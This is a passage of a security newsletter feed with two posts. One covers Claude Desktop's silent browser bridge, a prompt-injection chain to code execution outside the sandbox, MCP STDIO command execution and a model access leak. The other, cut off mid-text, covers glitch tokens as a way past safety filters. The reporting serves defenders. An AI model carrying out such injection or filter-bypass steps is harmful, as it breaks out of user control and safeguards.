Chrome, Edge, Brave, Arc, Vivaldi, Opera, and Chromium profile directories, including browsers that aren&#8217;t actually installed yet.</p><p>A Native Messaging manifest is the file Chromium browsers read to decide which local programs an extension can launch. Claude Desktop drops one in seven different browser profile paths. Silently. Delete it and it comes back the next time Claude Desktop launches.</p><p>Important wrinkle the news cycle keeps blurring. The manifest comes from Claude Desktop, the chat app. Claude Code is the separate command-line developer tool. Same parent company, same family, same week of bad press.</p><p>Hanff <a href="https://www.thatprivacyguy.com/blog/anthropic-spyware/">calls it spyware</a>. Most of his peers stop short of that. Noah Kenney at Digital 520 called the technical claims testable and reproducible but pushed back on the <strong>&#8220;spyware&#8221;</strong> label. The consensus middle ground is &#8220;dark pattern,&#8221; and the EU framing is sharper.</p><p>Hanff is filing it under Article 5(3) of Directive 2002/58/EC, the ePrivacy Directive. Anthropic, as of writing, has not issued a public response.</p><p>So nothing is being stolen today. The bridge does nothing on its own. The problem is what it pre-positions for tomorrow. We&#8217;ve watched <a href="https://www.toxsec.com/p/the-magic-string-that-bricks-claude">Anthropic ship things they didn&#8217;t think through before</a>. This one has wiring.</p><h2>From Manifest to Sandbox Escape</h2><p>Here&#8217;s the chain.</p><p>A sandbox is the security wall between a browser tab and your operating system. Tabs run inside it. Extensions mostly run inside it. The whole point is that even if you click a bad link, the malicious code can&#8217;t reach your files. That wall is the entire reason the modern browser exists.</p><p>Native Messaging punches a hole through the wall on purpose. It lets a browser extension talk to a binary running outside the sandbox at full user privilege. That&#8217;s a feature. The bug is who gets to authorize the hole.</p><p>The manifest Anthropic drops pre-authorizes three Chrome extension IDs to call the helper via connectNative, granting access to browser automation features. Those extension IDs include ones the user has never installed.</p><p>Now stack the pieces. You install Claude Desktop expecting a chat app. It writes a bridge into your browsers without telling you. A Claude browser extension, current or future, is pre-authorized to use that bridge.</p><p>Months later, you let Claude visit a webpage. The page contains a hidden payload. Prompt injection is when malicious instructions hidden in content hijack what the AI does next. Anthropic&#8217;s own published numbers: Claude for Chrome is vulnerable to prompt injection at a 23.6% success rate without mitigations and 11.2% with current measures.</p><p>The injected agent now has a green-lit tunnel to a binary running with your user permissions. <strong>Outside the sandbox.</strong></p><p>Anthropic&#8217;s defense is essentially that the bridge currently does nothing on its own. True. The dial is set to zero. The wiring is hot. We&#8217;ve covered <a href="https://www.toxsec.com/p/openclaw-is-a-wildly-insecure">agents that escape sandboxes via prompt injection</a> before. The shape is familiar.</p><p>That&#8217;s why the spyware label keeps sticking even when the technical purists object. The keys are pre-positioned. One downstream injection turns them.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!EiVI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!EiVI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 424w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 848w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1272w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!EiVI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png" width="612" height="821.0322580645161" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1414,&quot;width&quot;:1054,&quot;resizeWidth&quot;:612,&quot;bytes&quot;:132650,&quot;alt&quot;:&quot;Sandbox Escape: Flow &#8594; Claude Code malware question answered: five-stage attack flow diagram showing Claude Desktop install, silent Native Messaging manifest drop into 7 browsers, extension pre-authorization, hostile webpage prompt injection, and code execution outside the browser sandbox at user privilege.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/195466711?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Sandbox Escape: Flow &#8594; Claude Code malware question answered: five-stage attack flow diagram showing Claude Desktop install, silent Native Messaging manifest drop into 7 browsers, extension pre-authorization, hostile webpage prompt injection, and code execution outside the browser sandbox at user privilege." title="Sandbox Escape: Flow &#8594; Claude Code malware question answered: five-stage attack flow diagram showing Claude Desktop install, silent Native Messaging manifest drop into 7 browsers, extension pre-authorization, hostile webpage prompt injection, and code execution outside the browser sandbox at user privilege." srcset="https://substackcdn.com/image/fetch/$s_!EiVI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 424w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 848w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1272w, https://substackcdn.com/image/fetch/$s_!EiVI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffecfd3b7-da1e-44d7-b991-921f548d8bb0_1054x1414.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>The MCP RCE Anthropic Won&#8217;t Patch</h2><p>Same week, Ox Security drops <a href="https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/">an advisory titled &#8220;The Mother of All AI Supply Chains.&#8221;</a></p><p>The Model Context Protocol is the open standard Anthropic built so AI agents can call tools, read files, run commands. It is the connective tissue between an LLM and an agent. We&#8217;ve covered MCP attacks at length, including <a href="https://www.toxsec.com/p/lets-poison-the-mcp">tool poisoning</a> and the <a href="https://www.toxsec.com/p/secure-your-mcp">defensive playbook</a>.</p><p>This one is structural. The flaw enables Arbitrary Command Execution on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories. It&#8217;s an architectural design decision baked into Anthropic&#8217;s official MCP SDKs across every supported language, including Python, TypeScript, Java, and Rust. RCE means remote code execution, the highest-tier outcome on offense.</p><p>The trick is brutally simple. MCP&#8217;s STDIO transport, that&#8217;s standard input/output, runs the configured command to spin up a tool server.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;d4caca05-77f2-499c-aa9b-691260488ae0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"># Anthropic's MCP STDIO transport, simplified
$ &lt;command&gt;
# command runs, server fails to spawn, MCP returns "error"
# but the OS already executed
</code></pre></div><p>If the command successfully creates an STDIO server it returns the handle, but when given a different command, it returns an error after the command is executed. So a malicious MCP entry on a marketplace doesn&#8217;t have to pretend to be a real tool. It just has to exist long enough for your IDE to call it once.</p><p>Ox poisoned 9 of 11 MCP marketplaces with a benign proof-of-concept. The supply chain reaches 150 million-plus downloads, 7,000 publicly accessible servers, and up to 200,000 vulnerable instances.</p><p>Anthropic&#8217;s response: <strong>&#8220;expected&#8221; behavior</strong>. They declined to modify the protocol. A protocol-level patch like manifest-only execution or a command allowlist would have instantly propagated to every downstream library. They passed.</p><h2>How Did Mythos Leak to a Random Discord?</h2><p>Now for the third act.</p><p>Mythos is Anthropic&#8217;s restricted vulnerability-hunting model. Released April 10 to select partners under &#8220;Project Glasswing,&#8221; roughly 40 organizations including Apple and Google, with Anthropic deeming it too powerful for public release.</p><p>The chain reads like a textbook walkthrough.</p><p>AI startup Mercor gets breached, exposing details about the URL format Anthropic uses for its models. A private Discord group that hunts for unreleased models picks up on the disclosure. One member is currently employed at a third-party contractor that works for Anthropic.</p><p>The member&#8217;s vendor credentials, combined with the leaked Mercor details, let the group locate Mythos online. They guess the URL pattern. They guess right. Anthropic never randomized the path.</p><p>The group has been using the program continuously since its release. A Bloomberg reporter is the one who told Anthropic.</p><p>A month of unauthorized access to the most dangerous model the company ever shipped, and the detection signal came from journalism. Not internal logging. Not telemetry. Not a single security alert. <strong>Bloomberg.</strong></p><p>If a Discord group in their basement got there first, assume Beijing and Moscow followed. &#8220;If some group, some random Discord online forum, got access to it, it&#8217;s already been breached by China,&#8221; David Lindner of Contrast Security <a href="https://fortune.com/2026/04/23/anthropic-mythos-leak-dario-amodei-ceo-cybersecurity-hackers-exploits-ai/">told Fortune</a>. Three steps in. Open-source intel, a contractor seat, a predictable URL. No zero-day required.</p><p>That&#8217;s the through-line on all three stories. The dark pattern bridge, the MCP STDIO design, the Mythos URL convention. Same move. Three times this week.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is Claude Code malware or spyware?</h3><p>No, Claude Code is the legitimate Anthropic command-line coding agent. The thing privacy researchers flagged is Claude Desktop, the chat app, which silently writes a Native Messaging manifest into multiple browser profile directories on macOS and pre-authorizes a few Claude extension IDs to talk to a local helper outside the browser sandbox. Most reviewers call that a dark pattern. Spyware in the strict sense requires actual exfiltration, and nobody has documented any. The risk lives in the bridge it pre-positions for future use.</p><h3>What can an attacker do with the Claude Desktop manifest right now?</h3><p>Nothing on its own. The manifest opens a door, but activation requires both a Claude browser extension installed and a successful prompt injection from a hostile webpage. Once that lands, the injected agent reaches the local helper through the pre-authorized bridge and runs commands at user privilege level, outside the sandbox. Anthropic&#8217;s own numbers put prompt injection success against Claude for Chrome at 11.2% even with mitigations. Pre-positioning the door without consent is the whole problem.</p><h3>Why hasn&#8217;t Anthropic patched the MCP command injection?</h3><p>Officially, Anthropic considers the STDIO behavior expected. Their position is that the protocol is built to launch local processes, sanitization is the developer&#8217;s job, and the SDKs work as designed. Ox Security disagrees and says manifest-only execution or a command allowlist at the protocol layer would have killed the entire vulnerability class for everyone downstream in one change. Until Anthropic moves, defenders have to harden each MCP-consuming app individually, which is what the supply chain looked like before this advisory dropped.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[Token-Level AI Security: The Opus 4.7 Tokenizer Graveyard]]></title><description><![CDATA[A new tokenizer ships fresh dead zones, and every model now carries a graveyard of glitch tokens nobody has mapped yet.]]></description><link>https://www.toxsec.com/p/token-level-ai-security-the-opus</link><guid isPermaLink="false">https://www.toxsec.com/p/token-level-ai-security-the-opus</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Fri, 24 Apr 2026 13:31:18 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!0rHB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0rHB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0rHB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0rHB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7092693,&quot;alt&quot;:&quot;Token-level AI security analysis of Claude Opus 4.7&#8217;s new tokenizer, covering glitch tokens, SolidGoldMagikarp-style vocabulary dead zones, and fresh LLM tokenization attack surfaces. &quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194937953?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F843d6186-7165-423c-8660-ced0e9471778_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Token-level AI security analysis of Claude Opus 4.7&#8217;s new tokenizer, covering glitch tokens, SolidGoldMagikarp-style vocabulary dead zones, and fresh LLM tokenization attack surfaces. " title="Token-level AI security analysis of Claude Opus 4.7&#8217;s new tokenizer, covering glitch tokens, SolidGoldMagikarp-style vocabulary dead zones, and fresh LLM tokenization attack surfaces. " srcset="https://substackcdn.com/image/fetch/$s_!0rHB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Claude Opus 4.7 shipped April 16 with a new tokenizer. Token counts jumped 1.0 to 1.35x, sometimes higher in the wild. Everyone&#8217;s fighting about pricing. Token-level AI security has a quieter question: every new tokenizer ships with a fresh graveyard of glitch tokens, and nobody has mapped this one yet.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Is Token-Level AI Security?</h2><p>Alright. Token-level AI security starts with the plumbing underneath every language model. That plumbing is where a surprising amount of attack surface lives, and Opus 4.7 just changed it.</p><p>A tokenizer is the thing that turns text into numbers. You type &#8220;hello world,&#8221; and before the model sees anything, that string gets chopped into a handful of tokens. Each token maps to an entry in a fixed vocabulary, usually around a hundred thousand slots, with each slot pointing to a vector the model actually reasons over.</p><p>No tokens, no math. No math, no model.</p><p>Most modern systems use a flavor of byte-pair encoding, BPE for short. BPE starts from individual characters and greedily merges the most common pairs into longer tokens until the vocabulary hits the target size. The exact list of merges decides how every input text gets sliced, and that slicing is what the model sees. Change the tokenizer and you change the model&#8217;s eyeballs.</p><p>Token-level AI security is the art of messing with that slicing. Keyword filters, safety classifiers, prompt injection detectors, they all operate on tokens or on strings that assume a particular tokenization. Break that assumption and you break the filter.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;5993a5af-0a62-4615-983a-a698d8d2eaa1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">import tiktoken

enc = tiktoken.get_encoding("cl100k_base")

text = "hello world"
ids  = enc.encode(text)

for tid in ids:
    print(f"{tid:&gt;6}  {enc.decode([tid])!r}")</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;cd2098e3-49d1-4d7b-bba2-56aa02d410bb&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"> 15339  'hello'
  1917  ' world'</code></pre></div><h2>Glitch Tokens and the Dead Zones in Every Vocabulary</h2><p>Here&#8217;s where it gets fun. A tokenizer gets built from one giant text corpus. The model gets trained on a different one. Those two corpora don&#8217;t always match.</p><p>A string can show up in the tokenizer corpus a million times and never appear once in the training data. When that happens, the vocabulary slot exists, but the embedding behind it is basically untouched noise. Dead on arrival.</p><p>In 2023, researchers documented a whole class of these and nicknamed them glitches. The canonical example is SolidGoldMagikarp. Somebody on the counting subreddit had spent years posting sequential numbers, and that username got slurped into the GPT-2 tokenizer corpus. The training data scraper skipped the forum itself. So the model shipped with a token for SolidGoldMagikarp whose embedding had never learned what that word meant.</p><p>Prompt GPT-2 or GPT-3 with the string and you&#8217;d get denial, hallucination, insults, gibberish, or a flat refusal. The token pointed nowhere useful and the model would fumble around trying to talk about something it couldn&#8217;t see.</p><p>There&#8217;s a whole zoo of these: petertodd with a leading space, davidjl123, TheNitromeFan, a handful of cursed gaming forum artifacts. Researchers have been hunting them down systematically. A 2024 paper called GlitchHunter found nearly eight thousand of them scattered across seven major LLMs.</p><p>Glitch tokens have been a documented filter bypass primitive for years. A keyword filter that looks for &#8220;bomb&#8221; doesn&#8217;t match if the BPE slicing routes around the word, and a weirdly tokenized input does exactly that on a fresh vocabulary.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!JRQO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!JRQO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 424w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 848w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1272w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!JRQO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png" width="988" height="220" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:220,&quot;width&quot;:988,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:23250,&quot;alt&quot;:&quot;Three Threats: Comparison: Token-level AI security threat diagram comparing tokenization-mismatch filter bypass, special token smuggling, and classifier desync across Opus 4.7's new tokenization surface.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194937953?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Three Threats: Comparison: Token-level AI security threat diagram comparing tokenization-mismatch filter bypass, special token smuggling, and classifier desync across Opus 4.7's new tokenization surface." title="Three Threats: Comparison: Token-level AI security threat diagram comparing tokenization-mismatch filter bypass, special token smuggling, and classifier desync across Opus 4.7's new tokenization surface." srcset="https://substackcdn.com/image/fetch/$s_!JRQO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 424w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 848w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1272w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h2>What Changed With Opus 4.7&#8217;s New Tokenizer?</h2><p>Anthropic shipped <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">Claude Opus 4.7</a>. The release notes led with benchmarks, the new xhigh reasoning mode, and <a href="https://platform.claude.com/docs/en/about-claude/models/whats-new-claude-4-7">a quiet flag that the tokenizer had changed</a>.</p><p>Token counts jumped anywhere from one to one point three five times on the same input. In the wild, <a href="https://simonwillison.net/2026/Apr/20/claude-token-counts/">Simon Willison got one point four six</a> and Claude Code Camp hit one point four seven. Everybody reasonably freaked out about pricing.</p><p>For the security side of the house, a new tokenizer is a different kind of earthquake.</p><p>A fresh vocabulary means a fresh set of dead zones. Every weird Reddit username, every scraped forum artifact, every near-duplicate of a special token that slipped into the new BPE merges is a candidate glitch.</p><p>As of today, no academic team has published a full glitch sweep against Opus 4.7&#8217;s vocabulary. The current state of the art at AAAI 2026 was evaluated on the old tokenizer. The map is blank.</p><p>And that&#8217;s just the untrained vectors. Safety classifiers, output regex filters, and moderation APIs often assume the old tokenization. Prompt caches are partitioned per model, so detection logic that relied on cached patterns is cold.</p><p>The <a href="https://www.toxsec.com/p/the-magic-string-that-bricks-claude">documented QA string that bricks Claude</a> was a single tokenized sequence. What other single sequences produce weird, untested behavior under the new vocabulary? Nobody has swept for them yet.</p><p>Anthropic&#8217;s pitch for the tokenizer change is &#8220;more literal instruction following.&#8221; Smaller tokens, the argument goes, force attention over individual 